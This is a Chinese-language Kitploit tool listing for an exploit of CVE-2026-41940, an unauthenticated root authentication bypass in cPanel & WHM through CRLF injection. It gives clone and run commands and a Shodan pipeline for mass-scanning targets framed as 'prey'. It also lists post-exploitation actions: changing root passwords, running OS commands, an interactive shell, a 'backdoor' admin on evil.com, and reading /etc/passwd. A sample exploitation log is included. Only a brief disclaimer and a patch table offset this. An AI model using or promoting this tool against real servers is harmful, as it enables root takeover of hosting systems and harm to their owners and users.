Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41940 — cPanel & WHM - 通过会话文件 CRLF 注入绕过身份验证 | Kitploit
工具/GitHubGitHub/0xgh057r3c0n/cve-2026-41940
身份验证与授权漏洞扫描器漏洞利用Web应用程序漏洞利用后渗透利用渗透测试红队
GitHub0xgh057r3c0n/cve-2026-41940

CVE-2026-41940

cPanel & WHM - 通过会话文件 CRLF 注入绕过身份验证

查看仓库
12320天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🔥 CVE-2026-41940 – cPanel 与 WHM 认证绕过

cPanel

⚡ 未认证 Root – 会话文件 CRLF 注入 ⚡
“一条链,掌控一切。”

Python License No deps CVSS


🧠 漏洞利用简述

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  阶段 1  ──  生成预认证会话 Cookie                        │
│  阶段 2  ──  通过 `Authorization` 头进行 CRLF 注入        │
│  阶段 3  ──  触发 `do_token_denied`(原始 → 缓存)        │
│  阶段 4  ──  通过 JSON API 验证 WHM Root 访问权限          │
└─────────────────────────────────────────────────────────────┘

💥 结果 – 无需任何凭据即可获得 WHM 的完整 Root 访问权限。


📜 许可证

本项目基于 MIT 许可证 发布 – 可自由使用、修改和分发,但请勿作恶 😈。
详情请参阅 LICENSE 文件。


🛠️ 安装 – 仅需一行命令

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940

零依赖 – 仅需 Python 3 标准库。
无需 pip、virtualenv 或任何其他工具。


🚀 快速开始 – 立即运行

单个目标

root@kitploit:~
./CVE-2026-41940.py -u https://target.com:2087

从文件批量扫描

root@kitploit:~
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json

从外部工具管道输入(Shodan、subfinder 等)

root@kitploit:~
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30

🎯 命令行选项(核心功能)


💀 利用后武器库

一旦你攻陷了目标主机,你可以:

  • 🔍 列出所有 cPanel 账户 – --action list
  • 🔑 更改 Root 密码 – --action passwd --passwd "h4ck3d!"
  • 🖥️ 执行操作系统命令 – --action cmd --cmd "id;whoami"
  • 📡 交互式 Shell – --action shell(完整 WHM 终端)
  • 👤 创建后门管理员 – --action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"
  • 📂 读取文件(通过 shell)– cat /etc/passwd
  • 📊 收集服务器信息 – --action info

🧪 演示 – 你将看到的内容

root@kitploit:~
$ ./CVE-2026-41940.py -u https://192.168.1.100:2087

  配置信息:
   目标数   : 1
   线程数   : 10
   超时时间 : 15s
   操作     : 仅扫描

[10:23:15] [SCAN] 开始 4 阶段利用链... https://192.168.1.100:2087
[10:23:15] [INFO] 发现规范主机名: server.example.com
[10:23:15] [STEP] 阶段 1/4 — 生成预认证会话...
[10:23:16] [  OK] 阶段1: 预认证会话 = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] 阶段 2/4 — 通过 Authorization 头进行 CRLF 注入...
[10:23:17] [  OK] 阶段2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] 阶段 3/4 — 触发 do_token_denied 小工具(原始→缓存)...
[10:23:18] [  OK] 阶段3: HTTP 401 — do_token_denied 小工具已触发
[10:23:18] [STEP] 阶段 4/4 — 验证 WHM Root 访问权限...
[10:23:18] [INFO] 阶段4: HTTP 200  {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 已确认 — 获得 WHM Root 访问权限!(v11.118.0.63 — 已确认存在漏洞)
[10:23:18] [PWND]   Token    : /cpsess1234567890
[10:23:18] [PWND]   Session  : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND]   Version  : 11.118.0.63
[10:23:18] [PWND]   API URL  : https://192.168.1.100:2087/cpsess1234567890/json-api/version

  CVE-2026-41940 — 扫描完成
  耗时: 3.2s  ·  目标数: 1

  1 个存在漏洞的目标

  [*] 目标    : https://192.168.1.100:2087
  [*] 版本    : 11.118.0.63
  [*] Token   : /cpsess1234567890
  [*] API URL : https://192.168.1.100:2087/cpsess1234567890/json-api/version
  [*] Session : 9a7f8e3d2c1b0a9f
  [*] 证据    : {"version":"11.118.0.63",...}

🔎 Shodan 搜索语法(寻找你的猎物)

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087

📊 受影响版本 – 补丁状态

所有低于这些构建版本的版本均存在漏洞。


🕵️‍♂️ 作者与致谢

0xgh057r3c0n – 安全研究员、逆向工程师、咖啡爱好者。
GitHub | Twitter


⚠️ 免责声明

本工具仅用于授权的安全测试和教育目的。
未经授权访问计算机系统属于违法行为。作者和贡献者不对因使用本软件造成的任何滥用或损害负责。
请负责任地使用,并始终先获得许可。


🌟 支持 / 贡献

  • 发现 Bug?请提交 Issue。
  • 想改进代码?欢迎提交 PR。
  • 喜欢这个工具?请在 GitHub 上给它一个 ⭐!

🔥 攻破网络,但请保持合法。 🔥

下载工具
标志描述
-u, --url单个目标 URL(例如 https://host:2087)
-l, --list包含每行一个 URL 的文件
--hostname覆盖规范 Host 头(自动发现)
-t, --threads线程数(默认:10)
--timeout超时时间(秒)(默认:15)
--rate-limit目标之间的休眠时间(秒)
--action利用后操作:list、passwd、cmd、exec、info、version、shell、adduser
--passwd新的 Root 密码(与 --action passwd 配合使用)
--cmd操作系统命令(与 --action cmd/exec 配合使用)
--new-user新的 cPanel 用户名(与 --action adduser 配合使用)
--new-domain新的 cPanel 域名(与 --action adduser 配合使用)
-o, --output将结果保存为 JSON
分支已修补版本状态
11.11011.110.0.97🛡️ 已修复
11.11811.118.0.63🛡️ 已修复
11.12611.126.0.54🛡️ 已修复
11.13211.132.0.29🛡️ 已修复
11.13411.134.0.20🛡️ 已修复
11.13611.136.0.5🛡️ 已修复